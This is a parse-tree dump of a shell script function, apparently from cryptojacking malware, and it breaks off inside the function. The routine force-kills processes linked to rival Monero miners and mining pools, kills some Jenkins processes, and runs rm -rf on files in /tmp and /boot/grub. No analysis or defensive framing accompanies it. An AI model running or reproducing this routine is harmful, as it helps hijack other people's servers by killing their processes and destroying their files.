CommandNode(lineno=3, pos=(13, 26), parts=[
  AssignmentNode(lineno=3, pos=(13, 26), word='SHELL=/bin/sh'),
])
CommandNode(lineno=4, pos=(27, 92), parts=[
  AssignmentNode(lineno=4, pos=(27, 92), word='PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin'),
])
FunctionNode(lineno=92, pos=(93, 2754), parts=[
  ReservedwordNode(lineno=5, pos=(93, 101), word='function'),
  WordNode(lineno=5, pos=(102, 107), word='kills'),
  ReservedwordNode(lineno=5, pos=(107, 108), word='('),
  ReservedwordNode(lineno=5, pos=(108, 109), word=')'),
  CompoundNode(lineno=92, list=[
    ReservedwordNode(lineno=5, pos=(110, 111), word='{'),
    ListNode(lineno=92, pos=(217, 2753), parts=[
        CommandNode(lineno=10, pos=(217, 234), parts=[
          WordNode(lineno=10, pos=(217, 222), word='pkill'),
          WordNode(lineno=10, pos=(223, 225), word='-f'),
          WordNode(lineno=10, pos=(226, 234), word='sourplum'),
        ]),
        OperatorNode(lineno=11, op='\n', pos=(234, 235)),
        CommandNode(lineno=11, pos=(235, 247), parts=[
          WordNode(lineno=11, pos=(235, 240), word='pkill'),
          WordNode(lineno=11, pos=(241, 247), word='wnTKYg'),
        ]),
        OperatorNode(lineno=11, op='&&', pos=(248, 250)),
        CommandNode(lineno=11, pos=(251, 261), parts=[
          WordNode(lineno=11, pos=(251, 256), word='pkill'),
          WordNode(lineno=11, pos=(257, 261), word='ddg*'),
        ]),
        OperatorNode(lineno=11, op='&&', pos=(262, 264)),
        CommandNode(lineno=11, pos=(265, 281), parts=[
          WordNode(lineno=11, pos=(265, 267), word='rm'),
          WordNode(lineno=11, pos=(268, 271), word='-rf'),
          WordNode(lineno=11, pos=(272, 281), word='/tmp/ddg*'),
        ]),
        OperatorNode(lineno=11, op='&&', pos=(282, 284)),
        CommandNode(lineno=11, pos=(285, 303), parts=[
          WordNode(lineno=11, pos=(285, 287), word='rm'),
          WordNode(lineno=11, pos=(288, 291), word='-rf'),
          WordNode(lineno=11, pos=(292, 303), word='/tmp/wnTKYg'),
        ]),
        OperatorNode(lineno=12, op='\n', pos=(303, 304)),
        CommandNode(lineno=12, pos=(304, 328), parts=[
          WordNode(lineno=12, pos=(304, 306), word='rm'),
          WordNode(lineno=12, pos=(307, 310), word='-rf'),
          WordNode(lineno=12, pos=(311, 328), word='/boot/grub/deamon'),
        ]),
        OperatorNode(lineno=12, op='&&', pos=(329, 331)),
        CommandNode(lineno=12, pos=(332, 361), parts=[
          WordNode(lineno=12, pos=(332, 334), word='rm'),
          WordNode(lineno=12, pos=(335, 338), word='-rf'),
          WordNode(lineno=12, pos=(339, 361), word='/boot/grub/disk_genius'),
        ]),
        OperatorNode(lineno=13, op='\n', pos=(361, 362)),
        CommandNode(lineno=13, pos=(362, 385), parts=[
          WordNode(lineno=13, pos=(362, 364), word='rm'),
          WordNode(lineno=13, pos=(365, 368), word='-rf'),
          WordNode(lineno=13, pos=(369, 385), word='/tmp/*index_bak*'),
        ]),
        OperatorNode(lineno=14, op='\n', pos=(385, 386)),
        CommandNode(lineno=14, pos=(386, 410), parts=[
          WordNode(lineno=14, pos=(386, 388), word='rm'),
          WordNode(lineno=14, pos=(389, 392), word='-rf'),
          WordNode(lineno=14, pos=(393, 410), word='/tmp/*httpd.conf*'),
        ]),
        OperatorNode(lineno=15, op='\n', pos=(410, 411)),
        CommandNode(lineno=15, pos=(411, 434), parts=[
          WordNode(lineno=15, pos=(411, 413), word='rm'),
          WordNode(lineno=15, pos=(414, 417), word='-rf'),
          WordNode(lineno=15, pos=(418, 434), word='/tmp/*httpd.conf'),
        ]),
        OperatorNode(lineno=16, op='\n', pos=(434, 435)),
        CommandNode(lineno=16, pos=(435, 457), parts=[
          WordNode(lineno=16, pos=(435, 437), word='rm'),
          WordNode(lineno=16, pos=(438, 441), word='-rf'),
          WordNode(lineno=16, pos=(442, 457), word='/tmp/a7b104c270'),
        ]),
        OperatorNode(lineno=17, op='\n', pos=(457, 458)),
        CommandNode(lineno=17, pos=(458, 476), parts=[
          WordNode(lineno=17, pos=(458, 463), word='pkill'),
          WordNode(lineno=17, pos=(464, 466), word='-f'),
          WordNode(lineno=17, pos=(467, 476), word='AnXqV.yam'),
        ]),
        OperatorNode(lineno=18, op='\n', pos=(476, 477)),
        PipelineNode(lineno=18, pos=(477, 555), parts=[
          CommandNode(lineno=18, pos=(477, 484), parts=[
            WordNode(lineno=18, pos=(477, 479), word='ps'),
            WordNode(lineno=18, pos=(480, 484), word='auxf'),
          ]),
          PipeNode(lineno=18, pipe='|', pos=(484, 485)),
          CommandNode(lineno=18, pos=(485, 497), parts=[
            WordNode(lineno=18, pos=(485, 489), word='grep'),
            WordNode(lineno=18, pos=(490, 492), word='-v'),
            WordNode(lineno=18, pos=(493, 497), word='grep'),
          ]),
          PipeNode(lineno=18, pipe='|', pos=(497, 498)),
          CommandNode(lineno=18, pos=(498, 524), parts=[
            WordNode(lineno=18, pos=(498, 502), word='grep'),
            WordNode(lineno=18, pos=(503, 524), word='mine.moneropool.com'),
          ]),
          PipeNode(lineno=18, pipe='|', pos=(524, 525)),
          CommandNode(lineno=18, pos=(525, 541), parts=[
            WordNode(lineno=18, pos=(525, 528), word='awk'),
            WordNode(lineno=18, pos=(529, 541), word='{print $2}'),
          ]),
          PipeNode(lineno=18, pipe='|', pos=(541, 542)),
          CommandNode(lineno=18, pos=(542, 555), parts=[
            WordNode(lineno=18, pos=(542, 547), word='xargs'),
            WordNode(lineno=18, pos=(548, 552), word='kill'),
            WordNode(lineno=18, pos=(553, 555), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=19, op='\n', pos=(555, 556)),
        PipelineNode(lineno=19, pos=(556, 638), parts=[
          CommandNode(lineno=19, pos=(556, 563), parts=[
            WordNode(lineno=19, pos=(556, 558), word='ps'),
            WordNode(lineno=19, pos=(559, 563), word='auxf'),
          ]),
          PipeNode(lineno=19, pipe='|', pos=(563, 564)),
          CommandNode(lineno=19, pos=(564, 576), parts=[
            WordNode(lineno=19, pos=(564, 568), word='grep'),
            WordNode(lineno=19, pos=(569, 571), word='-v'),
            WordNode(lineno=19, pos=(572, 576), word='grep'),
          ]),
          PipeNode(lineno=19, pipe='|', pos=(576, 577)),
          CommandNode(lineno=19, pos=(577, 607), parts=[
            WordNode(lineno=19, pos=(577, 581), word='grep'),
            WordNode(lineno=19, pos=(582, 607), word='xmr.crypto-pool.fr:8080'),
          ]),
          PipeNode(lineno=19, pipe='|', pos=(607, 608)),
          CommandNode(lineno=19, pos=(608, 624), parts=[
            WordNode(lineno=19, pos=(608, 611), word='awk'),
            WordNode(lineno=19, pos=(612, 624), word='{print $2}'),
          ]),
          PipeNode(lineno=19, pipe='|', pos=(624, 625)),
          CommandNode(lineno=19, pos=(625, 638), parts=[
            WordNode(lineno=19, pos=(625, 630), word='xargs'),
            WordNode(lineno=19, pos=(631, 635), word='kill'),
            WordNode(lineno=19, pos=(636, 638), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=20, op='\n', pos=(638, 639)),
        PipelineNode(lineno=20, pos=(639, 721), parts=[
          CommandNode(lineno=20, pos=(639, 646), parts=[
            WordNode(lineno=20, pos=(639, 641), word='ps'),
            WordNode(lineno=20, pos=(642, 646), word='auxf'),
          ]),
          PipeNode(lineno=20, pipe='|', pos=(646, 647)),
          CommandNode(lineno=20, pos=(647, 659), parts=[
            WordNode(lineno=20, pos=(647, 651), word='grep'),
            WordNode(lineno=20, pos=(652, 654), word='-v'),
            WordNode(lineno=20, pos=(655, 659), word='grep'),
          ]),
          PipeNode(lineno=20, pipe='|', pos=(659, 660)),
          CommandNode(lineno=20, pos=(660, 690), parts=[
            WordNode(lineno=20, pos=(660, 664), word='grep'),
            WordNode(lineno=20, pos=(665, 690), word='xmr.crypto-pool.fr:3333'),
          ]),
          PipeNode(lineno=20, pipe='|', pos=(690, 691)),
          CommandNode(lineno=20, pos=(691, 707), parts=[
            WordNode(lineno=20, pos=(691, 694), word='awk'),
            WordNode(lineno=20, pos=(695, 707), word='{print $2}'),
          ]),
          PipeNode(lineno=20, pipe='|', pos=(707, 708)),
          CommandNode(lineno=20, pos=(708, 721), parts=[
            WordNode(lineno=20, pos=(708, 713), word='xargs'),
            WordNode(lineno=20, pos=(714, 718), word='kill'),
            WordNode(lineno=20, pos=(719, 721), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=21, op='\n', pos=(721, 722)),
        PipelineNode(lineno=21, pos=(722, 798), parts=[
          CommandNode(lineno=21, pos=(722, 729), parts=[
            WordNode(lineno=21, pos=(722, 724), word='ps'),
            WordNode(lineno=21, pos=(725, 729), word='auxf'),
          ]),
          PipeNode(lineno=21, pipe='|', pos=(729, 730)),
          CommandNode(lineno=21, pos=(730, 742), parts=[
            WordNode(lineno=21, pos=(730, 734), word='grep'),
            WordNode(lineno=21, pos=(735, 737), word='-v'),
            WordNode(lineno=21, pos=(738, 742), word='grep'),
          ]),
          PipeNode(lineno=21, pipe='|', pos=(742, 743)),
          CommandNode(lineno=21, pos=(743, 767), parts=[
            WordNode(lineno=21, pos=(743, 747), word='grep'),
            WordNode(lineno=21, pos=(748, 767), word='zhuabcn@yahoo.com'),
          ]),
          PipeNode(lineno=21, pipe='|', pos=(767, 768)),
          CommandNode(lineno=21, pos=(768, 784), parts=[
            WordNode(lineno=21, pos=(768, 771), word='awk'),
            WordNode(lineno=21, pos=(772, 784), word='{print $2}'),
          ]),
          PipeNode(lineno=21, pipe='|', pos=(784, 785)),
          CommandNode(lineno=21, pos=(785, 798), parts=[
            WordNode(lineno=21, pos=(785, 790), word='xargs'),
            WordNode(lineno=21, pos=(791, 795), word='kill'),
            WordNode(lineno=21, pos=(796, 798), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=22, op='\n', pos=(798, 799)),
        PipelineNode(lineno=22, pos=(799, 872), parts=[
          CommandNode(lineno=22, pos=(799, 806), parts=[
            WordNode(lineno=22, pos=(799, 801), word='ps'),
            WordNode(lineno=22, pos=(802, 806), word='auxf'),
          ]),
          PipeNode(lineno=22, pipe='|', pos=(806, 807)),
          CommandNode(lineno=22, pos=(807, 819), parts=[
            WordNode(lineno=22, pos=(807, 811), word='grep'),
            WordNode(lineno=22, pos=(812, 814), word='-v'),
            WordNode(lineno=22, pos=(815, 819), word='grep'),
          ]),
          PipeNode(lineno=22, pipe='|', pos=(819, 820)),
          CommandNode(lineno=22, pos=(820, 841), parts=[
            WordNode(lineno=22, pos=(820, 824), word='grep'),
            WordNode(lineno=22, pos=(825, 841), word='monerohash.com'),
          ]),
          PipeNode(lineno=22, pipe='|', pos=(841, 842)),
          CommandNode(lineno=22, pos=(842, 858), parts=[
            WordNode(lineno=22, pos=(842, 845), word='awk'),
            WordNode(lineno=22, pos=(846, 858), word='{print $2}'),
          ]),
          PipeNode(lineno=22, pipe='|', pos=(858, 859)),
          CommandNode(lineno=22, pos=(859, 872), parts=[
            WordNode(lineno=22, pos=(859, 864), word='xargs'),
            WordNode(lineno=22, pos=(865, 869), word='kill'),
            WordNode(lineno=22, pos=(870, 872), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=23, op='\n', pos=(872, 873)),
        PipelineNode(lineno=23, pos=(873, 947), parts=[
          CommandNode(lineno=23, pos=(873, 880), parts=[
            WordNode(lineno=23, pos=(873, 875), word='ps'),
            WordNode(lineno=23, pos=(876, 880), word='auxf'),
          ]),
          PipeNode(lineno=23, pipe='|', pos=(880, 881)),
          CommandNode(lineno=23, pos=(881, 893), parts=[
            WordNode(lineno=23, pos=(881, 885), word='grep'),
            WordNode(lineno=23, pos=(886, 888), word='-v'),
            WordNode(lineno=23, pos=(889, 893), word='grep'),
          ]),
          PipeNode(lineno=23, pipe='|', pos=(893, 894)),
          CommandNode(lineno=23, pos=(894, 916), parts=[
            WordNode(lineno=23, pos=(894, 898), word='grep'),
            WordNode(lineno=23, pos=(899, 916), word='/tmp/a7b104c270'),
          ]),
          PipeNode(lineno=23, pipe='|', pos=(916, 917)),
          CommandNode(lineno=23, pos=(917, 933), parts=[
            WordNode(lineno=23, pos=(917, 920), word='awk'),
            WordNode(lineno=23, pos=(921, 933), word='{print $2}'),
          ]),
          PipeNode(lineno=23, pipe='|', pos=(933, 934)),
          CommandNode(lineno=23, pos=(934, 947), parts=[
            WordNode(lineno=23, pos=(934, 939), word='xargs'),
            WordNode(lineno=23, pos=(940, 944), word='kill'),
            WordNode(lineno=23, pos=(945, 947), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=24, op='\n', pos=(947, 948)),
        PipelineNode(lineno=24, pos=(948, 1030), parts=[
          CommandNode(lineno=24, pos=(948, 955), parts=[
            WordNode(lineno=24, pos=(948, 950), word='ps'),
            WordNode(lineno=24, pos=(951, 955), word='auxf'),
          ]),
          PipeNode(lineno=24, pipe='|', pos=(955, 956)),
          CommandNode(lineno=24, pos=(956, 968), parts=[
            WordNode(lineno=24, pos=(956, 960), word='grep'),
            WordNode(lineno=24, pos=(961, 963), word='-v'),
            WordNode(lineno=24, pos=(964, 968), word='grep'),
          ]),
          PipeNode(lineno=24, pipe='|', pos=(968, 969)),
          CommandNode(lineno=24, pos=(969, 999), parts=[
            WordNode(lineno=24, pos=(969, 973), word='grep'),
            WordNode(lineno=24, pos=(974, 999), word='xmr.crypto-pool.fr:6666'),
          ]),
          PipeNode(lineno=24, pipe='|', pos=(999, 1000)),
          CommandNode(lineno=24, pos=(1000, 1016), parts=[
            WordNode(lineno=24, pos=(1000, 1003), word='awk'),
            WordNode(lineno=24, pos=(1004, 1016), word='{print $2}'),
          ]),
          PipeNode(lineno=24, pipe='|', pos=(1016, 1017)),
          CommandNode(lineno=24, pos=(1017, 1030), parts=[
            WordNode(lineno=24, pos=(1017, 1022), word='xargs'),
            WordNode(lineno=24, pos=(1023, 1027), word='kill'),
            WordNode(lineno=24, pos=(1028, 1030), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=25, op='\n', pos=(1030, 1031)),
        PipelineNode(lineno=25, pos=(1031, 1113), parts=[
          CommandNode(lineno=25, pos=(1031, 1038), parts=[
            WordNode(lineno=25, pos=(1031, 1033), word='ps'),
            WordNode(lineno=25, pos=(1034, 1038), word='auxf'),
          ]),
          PipeNode(lineno=25, pipe='|', pos=(1038, 1039)),
          CommandNode(lineno=25, pos=(1039, 1051), parts=[
            WordNode(lineno=25, pos=(1039, 1043), word='grep'),
            WordNode(lineno=25, pos=(1044, 1046), word='-v'),
            WordNode(lineno=25, pos=(1047, 1051), word='grep'),
          ]),
          PipeNode(lineno=25, pipe='|', pos=(1051, 1052)),
          CommandNode(lineno=25, pos=(1052, 1082), parts=[
            WordNode(lineno=25, pos=(1052, 1056), word='grep'),
            WordNode(lineno=25, pos=(1057, 1082), word='xmr.crypto-pool.fr:7777'),
          ]),
          PipeNode(lineno=25, pipe='|', pos=(1082, 1083)),
          CommandNode(lineno=25, pos=(1083, 1099), parts=[
            WordNode(lineno=25, pos=(1083, 1086), word='awk'),
            WordNode(lineno=25, pos=(1087, 1099), word='{print $2}'),
          ]),
          PipeNode(lineno=25, pipe='|', pos=(1099, 1100)),
          CommandNode(lineno=25, pos=(1100, 1113), parts=[
            WordNode(lineno=25, pos=(1100, 1105), word='xargs'),
            WordNode(lineno=25, pos=(1106, 1110), word='kill'),
            WordNode(lineno=25, pos=(1111, 1113), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=26, op='\n', pos=(1113, 1114)),
        PipelineNode(lineno=26, pos=(1114, 1195), parts=[
          CommandNode(lineno=26, pos=(1114, 1121), parts=[
            WordNode(lineno=26, pos=(1114, 1116), word='ps'),
            WordNode(lineno=26, pos=(1117, 1121), word='auxf'),
          ]),
          PipeNode(lineno=26, pipe='|', pos=(1121, 1122)),
          CommandNode(lineno=26, pos=(1122, 1134), parts=[
            WordNode(lineno=26, pos=(1122, 1126), word='grep'),
            WordNode(lineno=26, pos=(1127, 1129), word='-v'),
            WordNode(lineno=26, pos=(1130, 1134), word='grep'),
          ]),
          PipeNode(lineno=26, pipe='|', pos=(1134, 1135)),
          CommandNode(lineno=26, pos=(1135, 1164), parts=[
            WordNode(lineno=26, pos=(1135, 1139), word='grep'),
            WordNode(lineno=26, pos=(1140, 1164), word='xmr.crypto-pool.fr:443'),
          ]),
          PipeNode(lineno=26, pipe='|', pos=(1164, 1165)),
          CommandNode(lineno=26, pos=(1165, 1181), parts=[
            WordNode(lineno=26, pos=(1165, 1168), word='awk'),
            WordNode(lineno=26, pos=(1169, 1181), word='{print $2}'),
          ]),
          PipeNode(lineno=26, pipe='|', pos=(1181, 1182)),
          CommandNode(lineno=26, pos=(1182, 1195), parts=[
            WordNode(lineno=26, pos=(1182, 1187), word='xargs'),
            WordNode(lineno=26, pos=(1188, 1192), word='kill'),
            WordNode(lineno=26, pos=(1193, 1195), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=27, op='\n', pos=(1195, 1196)),
        PipelineNode(lineno=27, pos=(1196, 1278), parts=[
          CommandNode(lineno=27, pos=(1196, 1203), parts=[
            WordNode(lineno=27, pos=(1196, 1198), word='ps'),
            WordNode(lineno=27, pos=(1199, 1203), word='auxf'),
          ]),
          PipeNode(lineno=27, pipe='|', pos=(1203, 1204)),
          CommandNode(lineno=27, pos=(1204, 1216), parts=[
            WordNode(lineno=27, pos=(1204, 1208), word='grep'),
            WordNode(lineno=27, pos=(1209, 1211), word='-v'),
            WordNode(lineno=27, pos=(1212, 1216), word='grep'),
          ]),
          PipeNode(lineno=27, pipe='|', pos=(1216, 1217)),
          CommandNode(lineno=27, pos=(1217, 1247), parts=[
            WordNode(lineno=27, pos=(1217, 1221), word='grep'),
            WordNode(lineno=27, pos=(1222, 1247), word='stratum.f2pool.com:8888'),
          ]),
          PipeNode(lineno=27, pipe='|', pos=(1247, 1248)),
          CommandNode(lineno=27, pos=(1248, 1264), parts=[
            WordNode(lineno=27, pos=(1248, 1251), word='awk'),
            WordNode(lineno=27, pos=(1252, 1264), word='{print $2}'),
          ]),
          PipeNode(lineno=27, pipe='|', pos=(1264, 1265)),
          CommandNode(lineno=27, pos=(1265, 1278), parts=[
            WordNode(lineno=27, pos=(1265, 1270), word='xargs'),
            WordNode(lineno=27, pos=(1271, 1275), word='kill'),
            WordNode(lineno=27, pos=(1276, 1278), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=28, op='\n', pos=(1278, 1279)),
        PipelineNode(lineno=28, pos=(1279, 1350), parts=[
          CommandNode(lineno=28, pos=(1279, 1286), parts=[
            WordNode(lineno=28, pos=(1279, 1281), word='ps'),
            WordNode(lineno=28, pos=(1282, 1286), word='auxf'),
          ]),
          PipeNode(lineno=28, pipe='|', pos=(1286, 1287)),
          CommandNode(lineno=28, pos=(1287, 1299), parts=[
            WordNode(lineno=28, pos=(1287, 1291), word='grep'),
            WordNode(lineno=28, pos=(1292, 1294), word='-v'),
            WordNode(lineno=28, pos=(1295, 1299), word='grep'),
          ]),
          PipeNode(lineno=28, pipe='|', pos=(1299, 1300)),
          CommandNode(lineno=28, pos=(1300, 1317), parts=[
            WordNode(lineno=28, pos=(1300, 1304), word='grep'),
            WordNode(lineno=28, pos=(1305, 1317), word='xmrpool.eu'),
          ]),
          PipeNode(lineno=28, pipe='|', pos=(1318, 1319)),
          CommandNode(lineno=28, pos=(1320, 1336), parts=[
            WordNode(lineno=28, pos=(1320, 1323), word='awk'),
            WordNode(lineno=28, pos=(1324, 1336), word='{print $2}'),
          ]),
          PipeNode(lineno=28, pipe='|', pos=(1336, 1337)),
          CommandNode(lineno=28, pos=(1337, 1350), parts=[
            WordNode(lineno=28, pos=(1337, 1342), word='xargs'),
            WordNode(lineno=28, pos=(1343, 1347), word='kill'),
            WordNode(lineno=28, pos=(1348, 1350), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=29, op='\n', pos=(1350, 1351)),
        PipelineNode(lineno=29, pos=(1351, 1446), parts=[
          CommandNode(lineno=29, pos=(1351, 1356), parts=[
            WordNode(lineno=29, pos=(1351, 1353), word='ps'),
            WordNode(lineno=29, pos=(1354, 1356), word='ax'),
          ]),
          PipeNode(lineno=29, pipe='|', pos=(1356, 1357)),
          CommandNode(lineno=29, pos=(1357, 1365), parts=[
            WordNode(lineno=29, pos=(1357, 1361), word='grep'),
            WordNode(lineno=29, pos=(1362, 1365), word='var'),
          ]),
          PipeNode(lineno=29, pipe='|', pos=(1365, 1366)),
          CommandNode(lineno=29, pos=(1366, 1374), parts=[
            WordNode(lineno=29, pos=(1366, 1370), word='grep'),
            WordNode(lineno=29, pos=(1371, 1374), word='lib'),
          ]),
          PipeNode(lineno=29, pipe='|', pos=(1374, 1375)),
          CommandNode(lineno=29, pos=(1375, 1387), parts=[
            WordNode(lineno=29, pos=(1375, 1379), word='grep'),
            WordNode(lineno=29, pos=(1380, 1387), word='jenkins'),
          ]),
          PipeNode(lineno=29, pipe='|', pos=(1387, 1388)),
          CommandNode(lineno=29, pos=(1388, 1404), parts=[
            WordNode(lineno=29, pos=(1388, 1392), word='grep'),
            WordNode(lineno=29, pos=(1393, 1395), word='-v'),
            WordNode(lineno=29, pos=(1396, 1404), word='httpPort'),
          ]),
          PipeNode(lineno=29, pipe='|', pos=(1404, 1405)),
          CommandNode(lineno=29, pos=(1405, 1421), parts=[
            WordNode(lineno=29, pos=(1405, 1409), word='grep'),
            WordNode(lineno=29, pos=(1410, 1412), word='-v'),
            WordNode(lineno=29, pos=(1413, 1421), word='headless'),
          ]),
          PipeNode(lineno=29, pipe='|', pos=(1421, 1422)),
          CommandNode(lineno=29, pos=(1422, 1432), parts=[
            WordNode(lineno=29, pos=(1422, 1426), word='grep'),
            WordNode(lineno=29, pos=(1427, 1432), word='-c'),
          ]),
          PipeNode(lineno=29, pipe='|', pos=(1432, 1433)),
          CommandNode(lineno=29, pos=(1433, 1446), parts=[
            WordNode(lineno=29, pos=(1433, 1438), word='xargs'),
            WordNode(lineno=29, pos=(1439, 1443), word='kill'),
            WordNode(lineno=29, pos=(1444, 1446), word='-9'),
          ]),
        ]),
        OperatorNode(lineno=30, op='\n', pos=(1446, 1447)),
        PipelineNode(lineno=30, pos=(1447, 1490), parts=[
          CommandNode(lineno=30, pos=(1447, 1452), parts=[
            WordNode(lineno=30, pos=(1447, 1449), word='ps'),
            WordNode(lineno=30, pos=(1450, 1452), word='ax'),
          ]),
          PipeNode(lineno=30, pipe='|', pos=(1452, 1453)),
          CommandNode(lineno=30, pos=(1453, 1474), parts=[
            WordNode(lineno=30, pos=(1453, 1457), word='grep'),
            WordNode(lineno=30, pos=(1458, 1460), word='-o'),
            WordNode(lineno=30, pos=(1461, 1474), word='./[0-9]* -c'),
          ]),
          PipeNode(lineno=30, pipe='|', pos=(1474, 1475)),
          CommandNode(lineno=30, pos=(1476, 1490), parts=[
            WordNode(lineno=30, pos=(1476, 1481), word='xargs'),
            WordNode(lineno=30, pos=(1482, 1487), word='pkill'),
            WordNode(lineno=30, pos=(1488, 1490), word='-f'),
          ]),
        ]),
        OperatorNode(lineno=31, op='\n', pos=(1490, 1491)),
        CommandNode(lineno=31, pos=(1491, 1513), parts=[
          WordNode(lineno=31, pos=(1491, 1496), word='pkill'),
          WordNode(lineno=31, pos=(1497, 1499), word='-f'),
          WordNode(lineno=31, pos=(1500, 1513), word='biosetjenkins'),
        ]),
        OperatorNode(lineno=32, op='\n', pos=(1513, 1514)),
        CommandNode(lineno=32, pos=(1514, 1531), parts=[
          WordNode(lineno=32, pos=(1514, 1519), word='pkill'),
          WordNode(lineno=32, pos=(1520, 1522), word='-f'),
          WordNode(lineno=32, pos=(1523, 1531), word='Loopback'),
        ]),
        OperatorNode(lineno=33, op='\n', pos=(1531, 1532)),
        CommandNode(lineno=33, pos=(1532, 1548), parts=[
          WordNode(lineno=33, pos=(1532, 1537), word='pkill'),
          WordNode(lineno=33, pos=(1538, 1540), word='-f'),
          WordNode(lineno=33, pos=(1541, 1548), word='apaceha'),
        ]),
        OperatorNode(lineno=34, op='\n', pos=(1548, 1549)),
        CommandNode(lineno=34, pos=(1549, 1569), parts=[
          WordNode(lineno=34, pos=(1549, 1554), word='pkill'),
          WordNode(lineno=34, pos=(1555, 1557), word='-f'),
          WordNode(lineno=34, pos=(1558, 1569), word='cryptonight'),
        ]),
        OperatorNode(lineno=35, op='\n', pos=(1569, 1570)),
        CommandNode(lineno=35, pos=(1570, 1586), parts=[
          WordNode(lineno=35, pos=(1570, 1575), word='pkill'),
          WordNode(lineno=35, pos=(1576, 1578), word='-f'),
          WordNode(lineno=35, pos=(1579, 1586), word='stratum'),
        ]),
        OperatorNode(lineno=36, op='\n', pos=(1586, 1587)),
        CommandNode(lineno=36, pos=(1587, 1604), parts=[
          WordNode(lineno=36, pos=(1587, 1592), word='pkill'),
          WordNode(lineno=36, pos=(1593, 1595), word='-f'),
          WordNode(lineno=36, pos=(1596, 1604), word='mixnerdx'),
        ]),
        OperatorNode(lineno=37, op='\n', pos=(1604, 1605)),
        CommandNode(lineno=37, pos=(1605, 1624), parts=[
          WordNode(lineno=37, pos=(1605, 1610), word='pkill'),
          WordNode(lineno=37, pos=(1611, 1613), word='-f'),
          WordNode(lineno=37, pos=(1614, 1624), word='performedl'),
        ]),
        OperatorNode(lineno=38, op='\n', pos=(1624, 1625)),
        CommandNode(lineno=38, pos=(1625, 1642), parts=[
          WordNode(lineno=38, pos=(1625, 1630), word='pkill'),
          WordNode(lineno=38, pos=(1631, 1633), word='-f'),
          WordNode(lineno=38, pos=(1634, 1642), word='JnKihGjn'),
        ]),
        OperatorNode(lineno=39, op='\n', pos=(1642, 1643)),
        CommandNode(lineno=39, pos=(1643, 1662), parts=[
          WordNode(lineno=39, pos=(1643, 1648), word='pkill'),
          WordNode(lineno=39, pos=(1649, 1651), word='-f'),
          WordNode(lineno=39, pos=(1652, 1662), word='irqba2anc1'),
        ]),
        OperatorNode(lineno=40, op='\n', pos=(1662, 1663)),
        CommandNode(lineno=40, pos=(1663, 1682), parts=[
          WordNode(lineno=40, pos=(1663, 1668), word='pkill'),
          WordNode(lineno=40, pos=(1669, 1671), word='-f'),
          WordNode(lineno=40, pos=(1672, 1682), word='irqba5xnc1'),
        ]),
        OperatorNode(lineno=41, op='\n', pos=(1682, 1683)),
        CommandNode(lineno=41, pos=(1683, 1699), parts=[
          WordNode(lineno=41, pos=(1683, 1688), word='pkill'),
          WordNode(lineno=41, pos=(1689, 1691), word='-f'),
          WordNode(lineno=41, pos=(1692, 1699), word='irqbnc1'),
        ]),
        OperatorNode(lineno=42, op='\n', pos=(1699, 1700)),
        CommandNode(lineno=42, pos=(1700, 1716), parts=[
          WordNode(lineno=42, pos=(1700, 1705), word='pkill'),
          WordNode(lineno=42, pos=(1706, 1708), word='-f'),
          WordNode(lineno=42, pos=(1709, 1716), word='ir29xc1'),
        ]),
        OperatorNode(lineno=43, op='\n', pos=(1716, 1717)),
        CommandNode(lineno=43, pos=(1717, 1731), parts=[
          WordNode(lineno=43, pos=(1717, 1722), word='pkill'),
          WordNode(lineno=43, pos=(1723, 1725), word='-f'),
          WordNode(lineno=43, pos=(1726, 1731), word='conns'),
        ]),
        OperatorNode(lineno=44, op='\n', pos=(1731, 1732)),
        CommandNode(lineno=44, pos=(1732, 1751), parts=[
          WordNode(lineno=44, pos=(1732, 1737), word='pkill'),
          WordNode(lineno=44, pos=(1738, 1740), word='-f'),
          WordNode(lineno=44, pos=(1741, 1751), word='irqbalance'),
        ]),
        OperatorNode(lineno=45, op='\n', pos=(1751, 1752)),
        CommandNode(lineno=45, pos=(1752, 1772), parts=[
          WordNode(lineno=45, pos=(1752, 1757), word='pkill'),
          WordNode(lineno=45, pos=(1758, 1760), word='-f'),
          WordNode(lineno=45, pos=(1761, 1772), word='crypto-pool'),
        ]),
        OperatorNode(lineno=46, op='\n', pos=(1772, 1773)),
        CommandNode(lineno=46, pos=(1773, 1789), parts=[
          WordNode(lineno=46, pos=(1773, 1778), word='pkill'),
          WordNode(lineno=46, pos=(1779, 1781), word='-f'),
          WordNode(lineno=46, pos=(1782, 1789), word='minexmr'),
        ]),
        OperatorNode(lineno=47, op='\n', pos=(1789, 1790)),
        CommandNode(lineno=47, pos=(1790, 1804), parts=[
          WordNode(lineno=47, pos=(1790, 1795), word='pkill'),
          WordNode(lineno=47, pos=(1796, 1798), word='-f'),
          WordNode(lineno=47, pos=(1799, 1804), word='XJnRj'),
        ]),
        OperatorNode(lineno=48, op='\n', pos=(1804, 1805)),
        CommandNode(lineno=48, pos=(1805, 1819), parts=[
          WordNode(lineno=48, pos=(1805, 1810), word='pkill'),
          WordNode(lineno=48, pos=(1811, 1813), word='-f'),
          WordNode(lineno=48, pos=(1814, 1819), word='NXLAi'),
        ]),
        OperatorNode(lineno=49, op='\n', pos=(1819, 1820)),
        CommandNode(lineno=49, pos=(1820, 1834), parts=[
          WordNode(lineno=49, pos=(1820, 1825), word='pkill'),
          WordNode(lineno=49, pos=(1826, 1828), word='-f'),
          WordNode(lineno=49, pos=(1829, 1834), word='BI5zj'),
        ]),
        OperatorNode(lineno=50, op='\n', pos=(1834, 1835)),
        CommandNode(lineno=50, pos=(1835, 1853), parts=[
          WordNode(lineno=50, pos=(1835, 1840), word='pkill'),
          WordNode(lineno=50, pos=(1841, 1843), word='-f'),
          WordNode(lineno=50, pos=(1844, 1853), word='askdljlqw'),
        ]),
        OperatorNode(lineno=51, op='\n', pos=(1853, 1854)),
        CommandNode(lineno=51, pos=(1854, 1869), parts=[
          WordNode(lineno=51, pos=(1854, 1859), word='pkill'),
          WordNode(lineno=51, pos=(1860, 1862), word='-f'),
          WordNode(lineno=51, pos=(1863, 1869), word='minerd'),
        ]),
